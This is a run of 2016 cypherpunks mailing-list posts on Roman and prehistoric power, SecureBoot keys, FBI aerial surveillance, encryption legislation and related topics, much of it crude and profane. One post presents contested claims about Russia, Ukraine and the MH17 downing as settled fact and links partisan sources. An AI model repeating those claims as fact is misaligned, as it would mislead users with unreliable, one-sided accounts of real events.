http://arstechnica.com/tech-policy/2016/04/child-porn-suspect-jailed-for-7-months-for-refusing-to-decrypt-hard-drives/ >> >> Amici Curiae by EFF and ACLU > This could set a VERY dangerous precedent. More links for those following the legal filings / Freenet crypto / commentary ... https://www.reddit.com/r/Freenet/ https://www.techdirt.com/articles/20160404/19300434101/using-all-writs-act-to-route-around-fifth-amendment.shtml https://www.techdirt.com/articles/20160517/11340134464/government-argues-that-indefinite-solitary-confinement-perfectly-acceptable-punishment-failing-to-decrypt-devices.shtml https://cdn.arstechnica.net/wp-content/uploads/2016/04/comply.pdf https://assets.documentcloud.org/documents/2783581/Granting-All-Writs.pdf https://assets.documentcloud.org/documents/2783585/Motion-to-Seal.pdf http://arstechnica.com/wp-content/uploads/2016/05/govporn.pdf http://ia601303.us.archive.org/0/items/gov.uscourts.paed.507511/gov.uscourts.paed.507511.8.0.pdf https://twitter.com/bradheath/status/714885413249351680 http://arstechnica.com/wp-content/uploads/2016/04/effamicus.pdf http://www.knowconnect.com/MIRLN From rayzer at riseup.net Sat May 21 16:30:00 2016 From: rayzer at riseup.net (Rayzer) Date: Sat, 21 May 2016 16:30:00 -0700 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <3C2D5D33-46F0-41D9-9E3B-FDB25980611E@gmail.com> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <57407658.2050309@riseup.net> <3C2D5D33-46F0-41D9-9E3B-FDB25980611E@gmail.com> Message-ID: <5740EF78.6030001@riseup.net> On 05/21/2016 02:13 PM, Robert Hettinga wrote: >> On May 21, 2016, at 10:53 AM, Rayzer wrote: >> >> sedentarism > Spelling’s a bitch: > > https://en.wikipedia.org/wiki/Sedentism > Spelling Nazi... It's quoted. > It is the definition of force-mononoply. As old as sedentarism, > which is about five thousand years older than agriculture. > > Cheers, > RAH -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From hettinga at gmail.com Sat May 21 14:13:25 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 21 May 2016 17:13:25 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <57407658.2050309@riseup.net> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <57407658.2050309@riseup.net> Message-ID: <3C2D5D33-46F0-41D9-9E3B-FDB25980611E@gmail.com> > On May 21, 2016, at 10:53 AM, Rayzer wrote: > > sedentarism Spelling’s a bitch: https://en.wikipedia.org/wiki/Sedentism From hettinga at gmail.com Sat May 21 14:37:03 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 21 May 2016 17:37:03 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> Message-ID: <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> > On May 21, 2016, at 9:14 AM, John Young wrote: > > Got proof? Depends on if you’re a Marxist and think that money steals power, or an anarchist and thinks that power steals money. The latter grabs the market-elephant blindly, the former sucks giant donkey dicks in the Tijuana Donkey show of force, fraud, and plunder. As an example of what Peter might have been alluding to, Pompey and Julius were rich Roman guys who got richer in the conquering trade, Pompey going east after pirates and then eastern kings, and Julius going after, well, Gaul, actually. And then, you know, Rome, after that. But, like I said, it’s older than that. Since people started staying in one place in middle Anatolia about 12-18,000 years ago, about five thousand years before they actually started cultivating the wheat they were harvesting every year and moving out from there down the Tigris and Euphrates and Nile and out into Fair Europa, all farmers -- and then mechanics -- since have been subject to the depredations of former hunter-gatherers who plundered them for their “surplus” assets. And priestly former scavengers who told them lies of pie in the sky when they die to justify the actions of the guys who, you know, beat the fuck out of you if you didn’t pay up. Because, like dogs, and hyenas, they could. Now the priests are academics, the media, and legislative politicians. The Hunter/gatherers are either professional military (mostly harmless…) or plundering proto-warlord aristocrats like, come to think of it, all four current extant presidential hopefuls, and the current occupant of Adams’ Edifice. There. How’s that? Cheers, RAH From jya at pipeline.com Sat May 21 15:02:14 2016 From: jya at pipeline.com (John Young) Date: Sat, 21 May 2016 18:02:14 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> Message-ID: Nice polemic. With deep respect for both titans of history, economics and metaphysics, lipsmacked with earnest opinion, I beg m'lords, for tiny eye-time, a screenshot of a tangible, physical shard of evidence to substantiate learned alleged long ago imaginary happenings. Say, a gnawed ankle, a dirt-packed bowel, a petrified turd, a skull showing insertion of tiger-tooth fact and sucked dry of bloody ideological superiority. This is stanky cypherpunks, not a Mar a Lago butler SM account. At 05:37 PM 5/21/2016, Robert Hettinga wrote: > > On May 21, 2016, at 9:14 AM, John Young wrote: > > > > Got proof? > >Depends on if you’re a Marxist and think that >money steals power, or an anarchist and thinks >that power steals money. The latter grabs the >market-elephant blindly, the former sucks giant >donkey dicks in the Tijuana Donkey show of force, fraud, and plunder. > > >As an example of what Peter might have been >alluding to, Pompey and Julius were rich Roman >guys who got richer in the conquering trade, >Pompey going east after pirates and then eastern >kings, and Julius going after, well, Gaul, >actually. And then, you know, Rome, after that. > > >But, like I said, it’s older than that. Since >people started staying in one place in middle >Anatolia about 12-18,000 years ago, about five >thousand years before they actually started >cultivating the wheat they were harvesting every >year and moving out from there down the Tigris >and Euphrates and Nile and out into Fair Europa, >all farmers -- and then mechanics -- since have >been subject to the depredations of former >hunter-gatherers who plundered them for their >“surplus” assets. And priestly former >scavengers who told them lies of pie in the sky >when they die to justify the actions of the guys >who, you know, beat the fuck out of you if you didn’t pay up. > >Because, like dogs, and hyenas, they could. > >Now the priests are academics, the media, and >legislative politicians. The Hunter/gatherers >are either professional military (mostly >harmless ) or plundering proto-warlord >aristocrats like, come to think of it, all four >current extant presidential hopefuls, and the >current occupant of Adams’ Edifice. > >There. How’s that? > >Cheers, >RAH From hettinga at gmail.com Sat May 21 15:17:56 2016 From: hettinga at gmail.com (Robert Hettinga) Date: Sat, 21 May 2016 18:17:56 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> Message-ID: <8168EC48-2228-42BD-866D-74675268514F@gmail.com> > On May 21, 2016, at 6:02 PM, John Young wrote: > > This is stanky cypherpunks, not a Mar a Lago butler SM account. Ah. Pics or it didn’t happen. Kewl. Google is my friend. Wikipedia, too... https://en.wikipedia.org/wiki/Pompey https://en.wikipedia.org/wiki/Julius_Caesar https://en.wikipedia.org/wiki/Sedentism https://en.wikipedia.org/wiki/Scavenger#As_a_human_behavior https://en.wikipedia.org/wiki/Hunter-gatherer https://en.wikipedia.org/wiki/Farmer https://en.wikipedia.org/wiki/Mechanic https://en.wikipedia.org/wiki/Monopoly_on_violence Knock yourself out, John. Pack your lunch. Cheers, RAH From juan.g71 at gmail.com Sat May 21 14:35:10 2016 From: juan.g71 at gmail.com (juan) Date: Sat, 21 May 2016 18:35:10 -0300 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <3C2D5D33-46F0-41D9-9E3B-FDB25980611E@gmail.com> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <57407658.2050309@riseup.net> <3C2D5D33-46F0-41D9-9E3B-FDB25980611E@gmail.com> Message-ID: <5740d453.d7a28c0a.c4eae.ffffd69d@mx.google.com> On Sat, 21 May 2016 17:13:25 -0400 Robert Hettinga wrote: > > > On May 21, 2016, at 10:53 AM, Rayzer wrote: > > > > sedentarism > > Spelling’s a bitch: > > https://en.wikipedia.org/wiki/Sedentism Ha! "sedentism" translates to "sedentarismo" in spanish, so I assumed "sedentarism" was an actual english word...bur apparentely it isn't. Funny that Rayzer used it... From grarpamp at gmail.com Sat May 21 21:52:28 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 00:52:28 -0400 Subject: [Cryptography] USB 3.0 authentication: market power and DRM? In-Reply-To: <1c3b0bab54260b7f0983791985100550.squirrel@deadhat.com> References: <696C0627-33CE-4FF5-9137-CAB97F5A3181@lrw.com> <201604150721.u3F7LNfc007004@new.toad.com> <201605010713.u417DLVH007291@new.toad.com> <572669DA.5060207@sonic.net> <0BE930DF-1F0E-4609-90DB-5D8B5957D5BF@lrw.com> <57278985.1090000@sonic.net> <1c3b0bab54260b7f0983791985100550.squirrel@deadhat.com> Message-ID: On 5/2/16, dj at deadhat.com wrote: > The CA that needs to exist would the the USB-IF. Who cares what CA exists. So long as it is *optional* to the user. Remember SecureBoot... You can find many motherboards with SecureBoot that have the Microsoft PK's locked in the BIOS. Best you can do is 'disable' it and not be 'secure' anymore. The Linux crowd went apeshit over it, and rightfully so. Then they dropped to their knees and wrote silly stub loaders and submitted them to their Microsoft Overlord for signing. They are still submitting to this scheme today, even though they don't have to... Because if you look, you can find boards that allow completely deleting the Microsoft keys and installing and managing your own in the BIOS, and opensource tools to sign and authorize your own loaders do exist. Buy those boards instead. Tech can be useful, but you better fight for, select, and maintain your private right and control over it. From grarpamp at gmail.com Sat May 21 23:57:49 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 02:57:49 -0400 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> Message-ID: On 5/21/16, John Young wrote: > I beg m'lords, for tiny eye-time, > a screenshot of a tangible, physical shard of evidence to substantiate > learned alleged long ago imaginary happenings. As can be seen here, this... http://rg3.github.io/youtube-dl/supportedsites.html is perfectly capable of supporting this... https://www.facebook.com/EvolvePolitics/videos/1666350230283584/ wherein lie quoted names in lawsuit, etc. It would also be highly appreciated if age sage Gutmann would [STOP] gratuitously modifying public subject lines with his own private label. It fucks up threading. From grarpamp at gmail.com Sun May 22 01:35:36 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 04:35:36 -0400 Subject: What Omidyar's been up to... In-Reply-To: References: <5739E8C0.6090001@riseup.net> <573A7644.3050307@riseup.net> Message-ID: Z: > "Inordinate wealth" (i.e. enslaving other humans) can be achieved with > property ownership - the owner then becomes a land lord, collecting > rent; that's difficult to achieve with NO property ownership On 5/16/16, Cari Machet wrote:> > Maybe they are news gathering to scope out where the next good eats are Basically this. Unless the current occupants are the ones both - setting up the system - with their names on the title in the end Bringing God to the godless usually isn't wanted and doesn't help. Z: > i.e. if you're allowed to live in your house without paying rent, grow food > without someone taking that food, and barter than food and your work > efforts without being taxed and can travel freely, then you are > essentially free - BUT land and property OWNERSHIP fucks that all up. Once you give up your voluntary rights, it starts looking dismal fast... https://www.google.com/search?q=no+property+tax https://www.google.com/search?q=no+income+tax https://www.google.com/search?q=no+sales+tax From pgut001 at cs.auckland.ac.nz Sat May 21 21:53:29 2016 From: pgut001 at cs.auckland.ac.nz (Peter Gutmann) Date: Sun, 22 May 2016 04:53:29 +0000 Subject: [FORGED] Fascism, Nazism, Henry Ford's successful sueing of the USGov, money and power - Fwd: A short clip from 'Everything Is A Rich Man's Trick' In-Reply-To: <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> References: <9A043F3CF02CD34C8E74AC1594475C73F4C86A4B@uxcn10-5.UoA.auckland.ac.nz> , <3745A69F-4C7B-444C-B328-62B3AB80D567@gmail.com> Message-ID: <9A043F3CF02CD34C8E74AC1594475C73F4C873D1@uxcn10-5.UoA.auckland.ac.nz> Robert Hettinga writes: >As an example of what Peter might have been alluding to, Pompey and Julius >were rich Roman guys who got richer in the conquering trade, Pompey going >east after pirates and then eastern kings, and Julius going after, well, >Gaul, actually. And then, you know, Rome, after that. I was thinking more the end of the empire, when practically everything was for sale, incuding the throne itself (Didius Julianus bought it from the Praetorians). You had to be careful though, Galba was put in power by the Praetorians, wouldn't pay them for lack of money (there was a formal name and process for this, the donativum), and was removed again by them not long afterwards. Perhaps a bit like a president failing to favour their biggest campaign contributors and losing the next election. Peter. From grarpamp at gmail.com Sun May 22 10:08:52 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 13:08:52 -0400 Subject: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue Message-ID: https://news.slashdot.org/story/16/04/07/1120214/spies-in-the-skies-fbi-planes-are-circling-us-cities Each weekday, dozens of U.S. government aircraft take to the skies and slowly circle over American cities. Piloted by agents of the FBI and the Department of Homeland Security (DHS), the planes are fitted with high-resolution video cameras, often working with "augmented reality" software that can superimpose onto the video images everything from street and business names to the owners of individual homes. At least a few planes have carried devices that can track the cell phones of people below. Most of the aircraft are small, flying a mile or so above ground, and many use exhaust mufflers to mute their engines -- making them hard to detect by the people they're spying on. [...] The government's aerial surveillance programs deserve scrutiny by the Supreme Court, said Adam Bates, a policy analyst with the Cato Institute, a libertarian think tank in Washington, D.C. "It's very difficult to know, because these are very secretive programs, exactly what information they're collecting and what they're doing with it," Bates told BuzzFeed News. From grarpamp at gmail.com Sun May 22 10:10:33 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 13:10:33 -0400 Subject: FBI Gripes About Crypto on Facebook/WhatsApp/Everywhere, People Rebuffing and Accepting "Costs"? In-Reply-To: References: Message-ID: https://it.slashdot.org/story/16/04/06/1929201/top-fbi-attorney-worried-about-whatsapp-encryption WhatsApp on Tuesday announced that all types of messages on the latest version of its app are now automatically protected by end-to-end encryption, and the FBI's top attorney is worried some of the platform's more than 1 billion global users will take advantage of the move to hide their crime- or terrorism-related communications. FBI General Counsel James Baker said in Washington on Tuesday that the decision by the Facebook-owned messaging platform to encrypt its global offerings "presents us with a significant problem" because criminals and terrorists could "get ideas." "If the public does nothing, encryption like that will continue to roll out," he said. "It has public safety costs. Folks have to understand that, and figure out how they are going to deal with that. Do they want the public to bear those costs? Do they want the victims of terrorism to bear those costs?"Maybe the government shouldn't have imposed so many surveillance programs on its citizens -- and kept quiet about it for years -- that they now feel the need to use sophisticated security technologies. From grarpamp at gmail.com Sun May 22 10:53:03 2016 From: grarpamp at gmail.com (grarpamp) Date: Sun, 22 May 2016 13:53:03 -0400 Subject: US Govt Reveals Bill Forcing Assistance, Chumping Crypto, Secrets Beget... Message-ID: https://yro.slashdot.org/story/16/04/06/2256257/fbi-telling-congress-how-it-hacked-iphone According to a new report in National Journal, the FBI has already briefed Senator Diane Feinstein (D-CA) on the methods used to break into the iPhone at the center of Apple's recent legal fight. Senator Richard Burr (R-NC) is also scheduled to be briefed on the topic in the days to come. TOP SECRET briefings to the two most worthless SECRET critters, at the top of the most worthless SECRET committee... is worthless to the people. And that's no SECRET. Yet somehow people continue to treat that as... notice served, all absolved. Don't forget... Torture, Murder, Surveillance, Databasing all supposedly went through that committee of the guilty too. Feinstein and Burr are both working on a new bill to limit the use of encryption in consumer technology, expected to be made public in the weeks to come. Much of the USA, online, even the world seem to be rather pissed with the stance and activities of the US Government against crypto. Cryptos should not just be in their own circles, but educating those they know... random public around them... that do not already know about the crypto / privacy issues, the things that haven't made the nightly news, etc. The battle against the second coming of Clipper is going to get uglier and riskier before it gets better. In part because new lawmaking is at stake, not just interpretation over old. Supposedly an educated populace has more influence over new laws than interpretation... The disclosures come amid widespread calls for the attack to be made public, particularly from privacy and technology groups. However the FBI's new method works, the ability to unlock an iPhone without knowing its passcode represents a significant break in Apple's security measures, one Apple would surely like to protect against. From rysiek at hackerspace.pl Sun May 22 12:46:50 2016 From: rysiek at hackerspace.pl (rysiek) Date: Sun, 22 May 2016 21:46:50 +0200 Subject: [Cryptography] USB 3.0 authentication: market power and DRM? In-Reply-To: References: <696C0627-33CE-4FF5-9137-CAB97F5A3181@lrw.com> <1c3b0bab54260b7f0983791985100550.squirrel@deadhat.com> Message-ID: <12421995.IVCIOo3m3U@lapuntu> Dnia niedziela, 22 maja 2016 00:52:28 CEST grarpamp pisze: > On 5/2/16, dj at deadhat.com wrote: > The Linux crowd went apeshit over it, and rightfully so. Then they > dropped to their knees and wrote silly stub loaders and submitted > them to their Microsoft Overlord for signing. They are still submitting > to this scheme today, even though they don't have to... > > Because if you look, you can find boards that allow completely > deleting the Microsoft keys and installing and managing your > own in the BIOS, and opensource tools to sign and authorize > your own loaders do exist. Buy those boards instead. You do realise that this is not an option for J. Random User that wants to "try Linux", right? They already have a laptop or a PC, and woon't be buying a new one just to try a new, unfamiliar OS. While I agree with the sentiment, and I am fucking furious at MS and hw manufacturers for caving in, and will make sure to buy a board that allows me to remove MS bullshit, I appreciate that somebody went the extra mile to make it possible for J. Random User to at least try Linux regardless of MS bullshit. -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From zen at freedbms.net Sun May 22 19:10:01 2016 From: zen at freedbms.net (Zenaan Harkness) Date: Mon, 23 May 2016 02:10:01 +0000 Subject: Russia's invasion of Ukraine - finally winding up; Australians nutcase MSM consuming lapdogs as usual Message-ID: The long tail of Ukraine's Western-backed disintegration continues: http://theduran.com/poroshenko-finally-admits-ukraines-military-defeat/ "Thousands of Ukrainian Nationalists Rally, Threaten Coup d'Etat": https://www.rt.com/news/343756-ukraine-nationalists-kiev-parliament/ A reminder of what it would really look like if Russia actually invaded Ukraine: http://russia-insider.com/en/politics/russia-makes-sure-war-will-be-hell-its-enemies-video/ri14375 For those unsure of what our Western democracy putschists have been fueling, another in depth on the Ukarine Maidan: http://theduran.com/little-little-maidan-truth-surfacing-ukraine-masks-revolution-documentary-air-sweden/ http://russia-insider.com/en/politics/finally-masks-revolution-maidan-documentary-full-eng-subs/ri12759 Now, in the face of 'the end is close': "Documentary Claiming MH17 Shot Down by Ukrainian Jet to Air on BBC" http://www.express.co.uk/news/world/663787/Ukrainian-fighter-jet-shot-Russian-crash-MH17-BBC-documentary we see Australian nutcases yet to consume anything but the MSM: http://www.abc.net.au/news/2016-05-22/mh17-australian-families-of-victims-to-sue-russia-putin/7435166 At least NATO exhibits rationality: "NATO Talking to Itself: Announces Meeting With Russia Without Informing Russia" http://www.presstv.ir/Detail/2016/05/20/466550/Russia-NATO-meeting From rayzer at riseup.net Mon May 23 07:27:26 2016 From: rayzer at riseup.net (Rayzer) Date: Mon, 23 May 2016 07:27:26 -0700 Subject: FBI Gripes About Crypto on Facebook... In-Reply-To: References: Message-ID: <5743134E.7060307@riseup.net> Tuesday over a month ago... On 05/22/2016 10:10 AM, grarpamp wrote: > https://it.slashdot.org/story/16/04/06/1929201/top-fbi-attorney-worried-about-whatsapp-encryption > > WhatsApp on Tuesday... Nevertheless the repeated reference to 'cost', which to 99.9% of the people who would hear that spoken means CASH COST (rather than safety and security costs) is telling. They know US currency is really damn near worthless and it's a good bullying point to push people's minds around with. Because people still want the 'stuff' dude, and if that pesky crypto gets in the way of their being able to accumulate it... Yeah... I know... Warped logic. And you expected critically rational consumers? Ps. Adbusters monthly mindbomb: "Everything is FINE. Keep shopping." Rr "In short, this is a very open and very active criminal investigation and we absolutely cannot release anything, particularly [[...REDACTED... ]] and we cannot assist [REDACTED] by releasing anything at this time." -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From admin at pilobilus.net Mon May 23 12:34:37 2016 From: admin at pilobilus.net (Steve Kinney) Date: Mon, 23 May 2016 15:34:37 -0400 Subject: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue In-Reply-To: References: Message-ID: <57435B4D.8050000@pilobilus.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On 05/22/2016 01:08 PM, grarpamp wrote: > https://news.slashdot.org/story/16/04/07/1120214/spies-in-the-skies-fb i-planes-are-circling-us-cities [ > etc. ] Good catch! With July 4 coming up the Take Back The Fourth people should have uses for this and similar paranoia vs. rage inducing information. In military aviation circles, black airplanes (which include helicopters) are ones without tail numbers, that don't file flight plans and keep their transponders off. So the FBI and DHS flights reported in the Buzzfeed article were anything but: Their identities and flight paths are highly visible in the public record. That's enough to make me conclude that these missions have are mostly about burning allocated budgets in time for renewal, and normalizing "routine" aerial surveillance in advance of any Court challenges regarding specific abuses. Whether the redundancy of building frequently updated high resolution Google Earth type views of "amusing" landscapes will be of any practical use is probably not a factor in whether or not they happen, and get paid for. I would be more interested in knowing what IT vendors are involved and how much they are making, than in what they are storing and how they are processing it. Re black airplanes, I have seen four: All in Orlando, FL which is a major epicenter of surveillance tech development. One late afternon in early December of 1999 three literal black helicopters flew over the downtown area at low altitude, passing directly over the City Hall building. They looked like customized passenger carriers, with Big shrouds over their engines. Their rotors were startlingly quiet: I expected to see a helicopter at normal altitude in the distance when I looked up, and three passed directly overhead just above treetop level. At the time I guessed Somebody was putting on a show, demonstrating their ability to evacuate any "important" people from downtown in the event of a Y2K Bug Apocalypse. A couple of years later, about a half mile from the same spot, an all white helicopter with no markings /or/ visible windows stood station for about 15 minutes at about 1500 feet, 1/4 mile south of a small anti-war demonstration at Colonial Drive and Magnolia. At the same time, a team was working the crowd - taking names and "why you came out today" under the guise of "I'm a journalism student." This was done under the watchful eye of a guy in shades at the back of the crowd who was taking notes between holding a non-stop conversation with his cuff links. The FBI had just opened a brand new "anti-terrorism" school in town. :o) -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iQEcBAEBAgAGBQJXQ1tNAAoJEECU6c5XzmuqpXIH/3fSHIUEoN8A5zYWY2t2VGVk cysSwD7Y90tI5u4/VBJT+RNBj5LtvS/SkfhmaD+9dhanPM0bCI/iZPkP07K+3wc8 KxbrUAyqG16BRRnL40zwPOBcFOs95rZx8AJi76+IA+2BEhXchC9m5npaLCYjKnoZ VHUx19bUVbsl88npq+NouEL6NuwmvMxU8lJ/L5vrXBQpWd/ECv+rrI6CSM5mpgqE 1sNMg91zDfCmRlGdynuwxlbEZWNBi3uZsWfzSJ2GddzY5LqOUvAnGTCLuPZ+Ryxi zCRD6FXr9k1T6u6Q2FfdwAxqwL8d+QR72a2qQKHFOQG39X7MCFi75uJ4L5sOZBs= =DbGt -----END PGP SIGNATURE----- From grarpamp at gmail.com Mon May 23 17:31:45 2016 From: grarpamp at gmail.com (grarpamp) Date: Mon, 23 May 2016 20:31:45 -0400 Subject: [Cryptography] Text of Burr-Feinstein encryption backdoor bill In-Reply-To: References: Message-ID: On 4/8/16, Henry Baker wrote: > https://assets.documentcloud.org/documents/2797124/Burr-Feinstein-Encryption-Bill-Discussion-Draft.pdf > > "Compliance with Court Orders Act of 2016" Current version... https://www.burr.senate.gov/imo/media/doc/BAG16460.pdf From rayzer at riseup.net Mon May 23 21:14:15 2016 From: rayzer at riseup.net (Rayzer) Date: Mon, 23 May 2016 21:14:15 -0700 Subject: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue In-Reply-To: References: Message-ID: <5743D517.5070107@riseup.net> On 05/22/2016 10:08 AM, grarpamp wrote: > https://news.slashdot.org/story/16/04/07/1120214/spies-in-the-skies-fbi-planes-are-circling-us-cities > Each weekday, dozens of U.S. government aircraft take to the skies and > slowly circle over American cities. Piloted by agents of the FBI and > the Department of Homeland Security (DHS), the planes are fitted with > high-resolution video cameras, often working with "augmented reality" > software that can superimpose onto the video images everything from > street and business names to the owners of individual homes. At least > a few planes have carried devices that can track the cell phones of > people below. Most of the aircraft are small, flying a mile or so > above ground, and many use exhaust mufflers to mute their engines -- > making them hard to detect by the people they're spying on. [...] The > government's aerial surveillance programs deserve scrutiny by the > Supreme Court, said Adam Bates, a policy analyst with the Cato > Institute, a libertarian think tank in Washington, D.C. "It's very > difficult to know, because these are very secretive programs, exactly > what information they're collecting and what they're doing with it," > Bates told BuzzFeed News. > This is all child's-play. A couple of years ago a company called Persistent Systems was discovered to have been doing full-time 24/7/365 Wide Area Surveillance of ALL OF LOS ANGELES COUNTY for the LASD. They changed their name to Dojo Technlogy to avoid the publicity. Locally they were noted by yours truly as the company that does the surveillance system for the local transit station (bus). They're probably also responsible for sat-tracking the buses which has been ongoing for literally decades. Again, full-time 24/7/365 Wide Area Surveillance of ALL OF LOS ANGELES COUNTY at a price the LASD could afford. Why waste money on aviation fuel? Rr -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: OpenPGP digital signature URL: From guninski at guninski.com Tue May 24 05:47:31 2016 From: guninski at guninski.com (Georgi Guninski) Date: Tue, 24 May 2016 15:47:31 +0300 Subject: 1st OpenPGP conference, September in Germany In-Reply-To: <573E1ABE.5060207@gmail.com> References: <87a8jnbfch.fsf@wheatstone.g10code.de> <573E1ABE.5060207@gmail.com> Message-ID: <20160524124731.GA689@sivokote.iziade.m$> On Thu, May 19, 2016 at 12:57:50PM -0700, Blibbet wrote: > FYI > Ask them about compatibility with previous century PGP and trivial collisions in the key id. From gmoss82 at gmail.com Tue May 24 21:41:52 2016 From: gmoss82 at gmail.com (Greg Moss) Date: Tue, 24 May 2016 21:41:52 -0700 Subject: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue In-Reply-To: <5743D517.5070107@riseup.net> References: <5743D517.5070107@riseup.net> Message-ID: <018701d1b63f$c2f13e80$48d3bb80$@gmail.com> OMG - what a bunch of tweakers! -----Original Message----- From: cypherpunks [mailto:cypherpunks-bounces at cpunks.org] On Behalf Of Rayzer Sent: Monday, May 23, 2016 9:14 PM To: cypherpunks at cpunks.org Subject: Re: FBI Black Helicopters Spying And Databasing Everything, Including Your Barbecue On 05/22/2016 10:08 AM, grarpamp wrote: > https://news.slashdot.org/story/16/04/07/1120214/spies-in-the-skies-fb > i-planes-are-circling-us-cities Each weekday, dozens of U.S. > government aircraft take to the skies and slowly circle over American > cities. Piloted by agents of the FBI and the Department of Homeland > Security (DHS), the planes are fitted with high-resolution video > cameras, often working with "augmented reality" > software that can superimpose onto the video images everything from > street and business names to the owners of individual homes. At least > a few planes have carried devices that can track the cell phones of > people below. Most of the aircraft are small, flying a mile or so > above ground, and many use exhaust mufflers to mute their engines -- > making them hard to detect by the people they're spying on. [...] The > government's aerial surveillance programs deserve scrutiny by the > Supreme Court, said Adam Bates, a policy analyst with the Cato > Institute, a libertarian think tank in Washington, D.C. "It's very > difficult to know, because these are very secretive programs, exactly > what information they're collecting and what they're doing with it," > Bates told BuzzFeed News. > This is all child's-play. A couple of years ago a company called Persistent Systems was discovered to have been doing full-time 24/7/365 Wide Area Surveillance of ALL OF LOS ANGELES COUNTY for the LASD. They changed their name to Dojo Technlogy to avoid the publicity. Locally they were noted by yours truly as the company that does the surveillance system for the local transit station (bus). They're probably also responsible for sat-tracking the buses which has been ongoing for literally decades. Again, full-time 24/7/365 Wide Area Surveillance of ALL OF LOS ANGELES COUNTY at a price the LASD could afford. Why waste money on aviation fuel? Rr From grarpamp at gmail.com Tue May 24 23:44:11 2016 From: grarpamp at gmail.com (grarpamp) Date: Wed, 25 May 2016 02:44:11 -0400 Subject: [Cryptography] Hacking spread spectrum clocking of HW ? In-Reply-To: References: Message-ID: On 5/24/16, Henry Baker wrote: > https://www.maximintegrated.com/en/app-notes/index.mvp/id/1995 > > Q: How hard is it to diddle with the spreading codes on these clocking > sources? I'd like to experiment with some longer codes. See their spec sheet... https://datasheets.maximintegrated.com/en/ds/DS1086-DS1086Z.pdf I looking for links to different whitepapers... where dither driving the spread is not pretty triangle frequency and amplitude, but is a random shared key. And it's driving an RF tx/rx capable of extremely wide spread range. Other option is to tx/rx faux wideband noise modulo a random spectrum key. Pointers? From jdb10987 at yahoo.com Tue May 24 23:05:52 2016 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 25 May 2016 06:05:52 +0000 (UTC) Subject: Random Number Generator article References: <643599566.243266.1464156352628.JavaMail.yahoo.ref@mail.yahoo.com> Message-ID: <643599566.243266.1464156352628.JavaMail.yahoo@mail.yahoo.com> Seems somewhat over-hyped, and not especially new either. Jim Bell http://www.dailymail.co.uk/sciencetech/article-3607142/Cybersecurity-breakthrough-masterpiece-technique-create-truly-random-numbers-revealed.html "It could mean completely secure encryption of data, be it emails or voting - and even help beat climate change. Researchers have revealed a groundbreaking new technique to create truly random numbers for the first time. The new method creates truly random numbers with less computational effort than other methods, which could facilitate significantly higher levels of security for everything from consumer credit card transactions to military communications. The new method takes two weakly random sequences of numbers, such as air temperatures and stock market prices sampled over time, and turns them into one sequence of truly random numbers. 'This is a problem I've come back to over and over again for more than 20 years,' said David Zuckerman, who led the study.Described by one cryptography expert as a 'masterpiece,' the University of Texas at Austin research could have wide ranging implications. 'I'm thrilled to have solved it.'Computer 